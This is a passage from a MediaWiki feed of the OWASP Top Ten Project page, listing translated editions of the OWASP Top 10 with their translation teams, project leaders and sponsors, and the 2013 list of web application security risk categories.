*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235626</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235626"/>
				<updated>2017-11-19T22:57:11Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: removed 2017 RC tab&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 Released==&lt;br /&gt;
The OWASP Top 10 - 2017 will be available for download on &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;20  November, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;. We are asking for comments to be submitted on the project's [https://github.com/OWASP/Top10/issues GitHub issues].&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_GM_(en).pdf | OWASP Top 10 2017 GM - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub](preferred)&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Oct 2017] OWASP Top 10 2017 - RC2 Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
